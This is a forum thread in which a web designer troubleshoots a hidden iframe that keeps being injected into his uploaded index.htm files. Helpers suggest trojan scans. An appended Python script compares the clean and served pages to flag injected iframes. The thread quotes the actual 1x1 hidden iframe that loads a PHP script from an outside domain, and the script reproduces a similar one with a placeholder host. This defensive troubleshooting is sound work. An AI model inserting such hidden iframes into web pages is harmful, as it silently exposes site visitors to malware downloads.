Hacked or Not?

3G_

Hi guys

Please forgive me if I'm posting this in the wrong thread...

I have the following situation:

I publish a website to my domain name.

After a few hours or a day, when I try to open the site it downloads very slowly or something is missing, etc... or sometimes the site is even still fine, but just loads slowly... then I notice it tries to download a script... called "http://mystats.biz/xxx/xxx.php"

I clicked to view the site's source code and voila, there was an iFrame added into my webpage (index.htm) that now tries to download that file!

It wasn't there when I published the file, so somehow it got there. I thought at first it was the server that was hacked but we tried it on several servers, international & local, and it happens to all of my sites I publish.

It can't be a thing on my PC because then it would be there straight after I published the file?!

Has anyone come across something like this? Google has no answer in English.

Regards
3G_
 
Something is amiss. Are you doing the actual hosting?
 
Sounds to me that the hosting provider is adding that frame by default to your page. Who is this host? Let us know please?
 
Where are you hosting? If it's on one of those free servers (Yahoo etc.) they load up ads with your webpages. It could well be that? Are you on a free hosted solution, or your own hosted server?
 
Hi guys

I have a few clients hosting on different servers, both abroad and locally. It seems like this happens only to sites that I upload via FTP from my PC, doesn't matter to which ISP it goes to.

This thing must come from my PC, however I can't understand how it works... I re-uploaded the one site's index.htm file (clean one) from my PC via FTP to the domain... after about 4 hours, I went to the site again and the script was added!

It looks like this when I view the source:

<iframe src='http://tstats.biz/st/index.php' width='1' height='1' style='visibility: hidden;'></iframe>

It adds itself just beneath the "body background" html tag.

As I say, this MUST be going to the server from my PC as it happens on different hosts, and only on the ones I updated recently. The only thing that I cannot understand, is that I upload a clean file and after a while it's infected.... very very strange indeed!

I'm totally confused with this
 
What OS are you using?

Can you try uploading from a different machine?
 
Need some input guys. I've been googling for the last 40 minutes ;)

http://forums.spikedhumor.com/showthread.php?t=4559

I see that after googling tstats.biz, don't visit the tstats URL, you will get infected.

I can't seem to narrow down the trojan, it's definitely a trojan.

AVG says this:

http://www.grisoft.com/doc/62/us/crp/0/idv/287339

It's very general, it's not much help to say the least.
My advice is to use the AVG removal utilities here:

http://www.grisoft.com/doc/63/us/crp/0

Use the vcleaner.exe (the first one) for Worm/Generic.FX

Also try the LOP.AH/Backdoor.Generic3.SVX

Hope you get it fixed. If anyone has more input? ;) :D :p
 
I'm browsing all over that redirect site with MSIE. Wonder what little bits of nasty I've been given :eek:

Doing a scan now. :)
 
LOL! same here, I pray it has been fixed since then :p ;) I've got Avast Pro installed and it's quite an aggressive thing to have, it didn't shout or spit, so I think you're fine :p ;) :D
 
I know I'm fine - it's a virtualised copy of XP. Going to trash it when I'm done playing. :)
 
Hey guys

Well I have to say - Thanks so much for the effort you are putting in to help me out here - you are most defs the best there is!! =)

I also found something you might want to read...

http://ethanzuckerman.com/blog/?p=1346

I have also found something when I googled for "iFrame virus" - they brought up the name "Bofra Worm"... which Symantec has a tool for. I'm using that to scan now...

But I will also try the others that you guys gave, thanks again, you are awesome! =)

3G_
 
So are you running some sort of blog/cms site?
 
Hi

Nope, I'm getting this on my regular static websites - basic sites I set up for clients and my own.

The code just magically appears in the HTML coding after a while... and that happens on any server that I publish the pages to.

3G_
 
Not to sound silly or anything, but you do realize the server is infected? :p That HTML code connects to the tstats IP address and downloads the trojan to the server or PC, depends ;)
 
Yea I thought about the server being infected but....

1. I use different servers from different countries from different ISPs ;
2. We scanned some of the servers, nothing found ;
3. This only happens to the domains (index.htm file) that I update ;

This doesn't happen to (a) other accounts / domains on that server ;
This doesn't happen to (b) other accounts / domains I did not update ;

It only happens to domains that I recently updated and only appears in the homepage, ie: index.htm

I'm still looking for answers to this mystery....


3G_
 
I can't understand how I can upload a clean HTML index.htm file and after a while it's got the iFrame script embedded....

And that ONLY happens on the files I recently updated.

Total mystery.
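
An added example, not part of the original thread: one way to catch the change described above is to compare the clean local copy of index.htm with the copy the server is currently serving and report any iframe that appears only in the served copy, flagging the 1x1 / hidden pattern quoted earlier. The host names, sample HTML and function names are constructed for illustration.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse
import re

class IframeCollector(HTMLParser):
    """Collects the attributes of every <iframe> start tag."""
    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.iframes = []

    def handle_starttag(self, tag, attrs):
        if tag == "iframe":
            self.iframes.append({k: (v or "") for k, v in attrs})

def find_iframes(html):
    parser = IframeCollector()
    parser.feed(html)
    parser.close()
    return parser.iframes

def _tiny(value):
    # True for "0", "1", "1px"; False for "", "400", "100%"
    m = re.match(r"\s*(\d+)", value)
    return bool(m) and int(m.group(1)) <= 1

def is_hidden(attrs):
    style = attrs.get("style", "").lower().replace(" ", "")
    css_hidden = "visibility:hidden" in style or "display:none" in style
    return css_hidden or (_tiny(attrs.get("width", "")) and _tiny(attrs.get("height", "")))

def injected_iframes(clean_html, served_html, site_host):
    """Iframes present in the served page but not in the clean local copy."""
    known = {f.get("src", "") for f in find_iframes(clean_html)}
    findings = []
    for f in find_iframes(served_html):
        src = f.get("src", "")
        if src in known:
            continue
        host = urlparse(src).hostname or site_host  # relative src = same site
        findings.append({"src": src, "external": host != site_host, "hidden": is_hidden(f)})
    return findings

# Constructed sample pages: the local copy and what the server returns later.
CLEAN = ('<html><body background="bg.gif"><h1>Welcome</h1>'
         '<iframe src="/map.html" width="400" height="300"></iframe></body></html>')
SERVED = CLEAN.replace(
    '<body background="bg.gif">',
    '<body background="bg.gif"><iframe src=\'http://injected.example/st/index.php\' '
    'width=\'1\' height=\'1\' style=\'visibility: hidden;\'></iframe>')

if __name__ == "__main__":
    for finding in injected_iframes(CLEAN, SERVED, "www.example.com"):
        print(finding)
```

Run on a schedule against each published page, the time of the first finding can be lined up with the server's FTP and access logs to see which login wrote the file.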
 